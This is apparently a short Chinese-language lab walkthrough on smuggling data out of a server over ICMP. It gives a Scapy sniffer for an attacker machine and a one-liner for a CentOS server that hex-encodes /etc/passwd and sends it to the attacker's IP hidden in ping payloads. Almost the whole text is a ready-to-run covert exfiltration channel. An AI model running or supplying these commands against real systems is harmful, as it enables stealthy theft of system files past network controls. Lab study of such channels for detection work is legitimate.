环境搭建:
攻击机kali:192.168.159.129
服务器centos:192.168.159.10
在攻击机上运行如下脚本(将此脚本在kali中另存为.py的文件,使用“python3 文件名”命令运行该、该脚本)
import sys
try:
from scapy.all import *
except:
print("Scapy not found, please install scapy: pip install scapy")
sys.exit(0)
def process_packet(pkt):
if pkt.haslayer(ICMP):
if pkt[ICMP].type == 8:
data = pkt[ICMP].load[-4:]
print(f'{data.decode("utf-8")}', flush=True, end="", sep="")
sniff(iface="eth0", prn=process_packet)
在服务器执行如下命令:(在服务器上执行此命令,攻击机上才能有信息出现)
xxd -p -c 4 /etc/passwd | while read line; do ping -c 1 -p $line 192.168.159.129; done